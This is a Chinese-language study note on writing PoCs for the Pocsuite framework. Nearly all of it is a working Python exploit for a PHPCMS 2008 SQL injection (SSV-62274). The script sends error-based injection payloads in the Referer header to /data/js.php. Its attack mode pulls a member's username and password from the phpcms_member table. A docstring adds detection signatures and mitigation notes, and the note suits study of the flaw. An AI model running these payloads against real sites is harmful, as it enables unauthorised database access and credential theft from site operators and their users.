在這里,首先向安全圈最大的娛樂公司,某404致敬。
參考博文 https://www.seebug.org/help/dev 向seebug平台及該文原作者致敬,雖然並不知道是誰
長話短說,其實可自由發揮的部分並不多,以原博文中的SQL注入例子(web應用漏洞)來記錄自己的學習心得筆記。
感覺整篇POC能自己發揮的並不多,從代碼上看,幾乎90%的代碼照要求填寫即可,自由發揮的部分,基本就是構造URL payload,發包匹配回顯。嗯,就醬。
戴著鐐銬起舞更美,是不是?哎,其他的照抄吧,自由發揮的部分主要在於漏洞研究,不在於開發代碼部分。抽時間還是要寫一寫的,想要個自己的站點balabala
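#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Pocsuite PoC for SSV-62274: PHPCMS 2008 SQL injection in /data/js.php.

The injection point is the HTTP ``Referer`` header sent to
``/data/js.php?id=1``.  Both modes depend on the application echoing the
MySQL error text back to the client: ``_verify`` looks for md5(1) inside
the response body, ``_attack`` parses the ``Duplicate entry ... for key``
error message.

Defender notes (detection / mitigation):
  * Requests to ``/data/js.php`` whose Referer header contains SQL syntax
    (``SELECT``, ``concat(``, ``floor(rand(0)*2)``, ``information_schema``)
    are a reliable signature for this PoC in web-server or WAF logs.
  * The PoC only succeeds when database errors are displayed to the
    client; disabling error output and upgrading PHPCMS removes the leak.
"""

# import system lib files
import os    # unused; kept from the original listing
import re
import sys   # unused; kept from the original listing
import json  # unused; kept from the original listing
import urlparse

# pocsuite framework helpers used below
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class mytest_poc(POCBase):
    """PoC class; pocsuite reads the metadata attributes and calls _verify / _attack."""

    vulID = '62274'  # vulnerability id (ssvid)
    version = 1  # poc version
    # author name list; the original listing ended it with a literal "...",
    # which is a syntax error on Python 2 -- replaced by plain placeholders
    author = ["no.1 author", "no.2 author"]
    vulDate = '2011-11-21'  # vulnerability discovery (report) date
    createDate = '2015-09-23'  # poc create date
    updateDate = '2015-09-23'  # poc update date
    # pocsuite reads this attribute as ``references`` (the original had a typo)
    references = ["http://www.seebug.org/vuldb/ssvid-62274"]
    name = '_62274_phpcms_2008_place_sql_inj_PoC'  # poc script name
    appPowerLink = 'http://www.phpcms.cn'  # app vendor link
    appName = 'PHPCMS'
    appVersion = '2008'
    vulType = 'SQL Injection'  # vulnerability type
    desc = """balabala"""  # description (placeholder)
    samples = ['http://10.1.200.28/']

    # vulnerable endpoint shared by both modes
    _VULN_PATH = '/data/js.php?id=1'

    def _send_payload(self, payload):
        """Send one request with *payload* in the Referer header.

        Returns ``(vulurl, resp)`` so callers can both inspect the
        response and report the URL they hit.
        """
        vulurl = urlparse.urljoin(self.url, self._VULN_PATH)
        # the Referer header is the injection point for this vulnerability
        head = {
            'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        return vulurl, resp

    def _attack(self):
        """Extract one phpcms_member row via the duplicate-key error message.

        Fixes from the original listing: ``urlparse.urljson`` -> ``urljoin``
        and ``reg`` -> ``req`` (the names ``_verify`` already used).
        """
        result = {}
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
        vulurl, resp = self._send_payload(payload)
        if resp.status_code == 200:
            # the leaked value is formatted as 1--<username>---<password>--
            match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_attack(result)

    def _verify(self):
        """Confirm the injection by looking for md5(1) echoed in the error text."""
        result = {}
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
        vulurl, resp = self._send_payload(payload)
        # 'c4ca4238a0b923820dcc509a6f75849b' is md5("1"), computed server-side
        if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap *result* in a pocsuite Output; an empty dict is reported as failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(mytest_poc)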